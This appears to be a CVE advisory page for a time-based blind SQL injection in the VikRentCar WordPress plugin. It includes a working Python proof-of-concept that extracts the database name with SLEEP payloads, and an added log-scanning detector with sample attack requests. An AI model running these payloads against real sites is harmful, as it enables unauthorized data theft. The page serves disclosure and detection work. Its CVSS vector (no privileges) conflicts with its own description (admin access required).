Security Vulnerability Report
CVE-2025-13724 CVSS 7.5 HIGH

CVE-2025-13724

Published: 2025-12-02 09:15:48
Last Modified: 2026-04-15 00:35:42

Description

The VikRentCar Car Rental Management System plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'month' parameter in all versions up to, and including, 1.4.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

VikRentCar Car Rental Management System plugin <= 1.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time

# CVE-2025-13724 PoC - Time-based Blind SQL Injection
# Target: WordPress VikRentCar plugin (<= 1.4.4)
# Parameter: month

target_url = "http://target-site.com/wp-admin/admin.php"

# Login with admin credentials to obtain session cookie
session = requests.Session()


def login(wordpress_url, username, password):
    """Authenticate to WordPress admin panel"""
    login_url = f"{wordpress_url}/wp-login.php"
    data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{wordpress_url}/wp-admin/"
    }
    response = session.post(login_url, data=data)
    return 'wordpress_logged_in' in session.cookies.get_dict()


def extract_data_via_blind_sql(wordpress_url):
    """Extract database name using time-based blind SQL injection"""
    # Construct malicious month parameter
    # Database name length detection
    length_payload = "1 AND IF(LENGTH(DATABASE())={length},SLEEP(5),0)---"
    # Character extraction payload
    char_payload = "1 AND IF(SUBSTRING(DATABASE(),{pos},1)='{char}',SLEEP(5),0)---"
    db_name = ""
    for pos in range(1, 20):  # Max length check
        for char in 'abcdefghijklmnopqrstuvwxyz0123456789_':
            payload = char_payload.format(pos=pos, char=char)
            params = {'page': 'vikrentcar', 'option': 'com_vikrentcar', 'task': 'overv', 'month': payload}
            start_time = time.time()
            response = session.get(wordpress_url + "/wp-admin/admin.php", params=params)
            elapsed = time.time() - start_time
            if elapsed >= 5:
                db_name += char
                print(f"[*] Extracted character: {char} | Current DB name: {db_name}")
                break
        else:
            break  # No more characters
    print(f"[+] Database name: {db_name}")
    return db_name


# Usage example
# login("http://target-site.com", "admin", "password")
# extract_data_via_blind_sql("http://target-site.com")
```
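A detection check added here (not part of the advisory, the PoC, or the plugin): it parses web-server access-log lines and flags requests to wp-admin/admin.php for page=vikrentcar whose month parameter carries SQL fragments such as SLEEP() or comment sequences, the shape the PoC above sends. The log lines, client IPs and timestamps are constructed samples, and the regexes are my own heuristics, not anything the plugin defines.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-format sample lines (not real traffic); line 2 carries a PoC-style month value.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Dec/2025:09:20:01 +0000] "GET /wp-admin/admin.php?page=vikrentcar&option=com_vikrentcar&task=overv&month=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [02/Dec/2025:09:20:07 +0000] "GET /wp-admin/admin.php?page=vikrentcar&option=com_vikrentcar&task=overv&month=1+AND+IF(LENGTH(DATABASE())%3D5,SLEEP(5),0)--- HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
198.51.100.9 - - [02/Dec/2025:09:21:00 +0000] "GET /wp-admin/admin.php?page=vikrentcar&task=overv&month=11 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# SQL fragments that have no business in a month selector: MySQL delay/string
# functions, boolean operators, comment openers and quote characters.
SQL_FRAGMENT_RE = re.compile(
    r"(?i)\b(?:sleep|benchmark|substring|substr|database|if)\s*\("
    r"|\b(?:and|or|union|select)\b|--|/\*|#|'"
)


def suspicious_month(value):
    """True when a (possibly double-encoded) month value contains SQL fragments."""
    return SQL_FRAGMENT_RE.search(unquote_plus(value)) is not None


def scan_log(text):
    """Return one record per VikRentCar admin request whose 'month' looks like SQL."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log entry in the expected format
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        if qs.get("page", [""])[0] != "vikrentcar":
            continue  # other admin pages are outside this CVE's scope
        for month in qs.get("month", []):  # parse_qs has URL-decoded once already
            if suspicious_month(month):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "task": qs.get("task", [""])[0], "month": month})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"[!] {hit['ts']} {hit['ip']} task={hit['task']} month={hit['month']!r}")
```

Because the description states that exploitation needs an authenticated Administrator-level session, a hit should be correlated with the WordPress account logged in from that client rather than treated as unauthenticated scanning.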

Weakness: CWE-89
Vulnerability Status: Deferred

References

https://plugins.trac.wordpress.org/browser/vikrentcar/tags/1.4.4/admin/views/overv/view.html.php#L195
https://plugins.trac.wordpress.org/browser/vikrentcar/trunk/admin/views/overv/view.html.php#L195
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403439%40vikrentcar&new=3403439%40vikrentcar&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/724a2da0-e4e7-4868-a1ad-fce69a915981?source=cve